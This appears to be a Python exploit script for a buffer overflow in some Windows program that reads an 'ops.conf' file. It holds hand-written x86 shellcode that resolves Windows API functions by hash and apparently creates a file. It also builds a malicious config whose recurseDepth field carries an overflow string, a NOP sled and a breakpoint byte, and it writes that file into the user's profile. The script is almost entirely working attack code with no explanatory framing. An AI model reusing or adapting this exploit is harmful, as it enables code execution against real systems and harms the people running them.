import os

shell="\x60\xe9\xca\x00\x00\x00\x55\x89\xe5\x56\x8b\x75\x08\x31\xc9"\
    "\x31\xc0\xac\x6b\xc9\x1f\x01\xc1\x85\xc0\x75\xf6\x89\xc8\x5e"\
    "\x5d\xc3\x64\xa1\x30\x00\x00\x00\x8b\x90\xa0\x00\x00\x00\x8b"\
    "\x40\x0c\x8b\x40\x1c\x83\xfa\x06\x7c\x02\x8b\x00\x8b\x00\x8b"\
    "\x40\x08\xc3\x55\x89\xe5\x53\x56\x57\x8b\x55\x08\x8b\x7d\x0c"\
    "\x8b\x5a\x3c\x8b\x5c\x13\x78\x01\xd3\x8b\x73\x20\x01\xd6\x8b"\
    "\x4b\x18\x51\xad\x01\xd0\x51\x50\xe8\x9f\xff\xff\xff\x83\xc4"\
    "\x04\x59\x39\xf8\x74\x07\xe2\xec\x59\x31\xc0\xeb\x16\x58\x29"\
    "\xc8\x8b\x73\x24\x01\xd6\x0f\xb7\x04\x46\x8b\x73\x1c\x01\xd6"\
    "\x8b\x04\x86\x01\xd0\x5f\x5e\x5b\x5d\xc3\x55\x89\xe5\xe8\x87"\
    "\xff\xff\xff\x8b\x55\x08\x52\x50\xe8\x9c\xff\xff\xff\x83\xc4"\
    "\x08\x5d\xc3\x5e\xad\x68\x15\x1d\x0b\x00\xe8\xdd\xff\xff\xff"\
    "\x83\xc4\x04\x6a\x00\x68\x80\x00\x00\x00\x6a\x02\x6a\x00\x68"\
    "\x00\x00\x00\xc0\x68\x19\x1d\x0b\x00\xff\xd0\x61\xc3\xe8\xd3"\
    "\xff\xff\xff\x97\xc2\x88\x4e\x43\x3a\x5c\x5c\x66\x2e\x74\x78"\
    "\x74\x5c\x30"
conf = """svcLogPath: {},\r\nfileLogPath: {},\r\noperations: {},\r\nrecurseDepth: {},\r\ndirPath: {},\r\n{}\0
""".format("svclist", "filelist", 6, '\x41'*284 + "\xff\xff\xff\xff", "C:\Users", '\x90' * 1024 + '\xCC')

#####################################
# 
#
#####################################
if __name__ == "__main__":
    with open(os.path.join(os.getenv("USERPROFILE"), "ops.conf"), 'wb') as f:
        f.write(conf)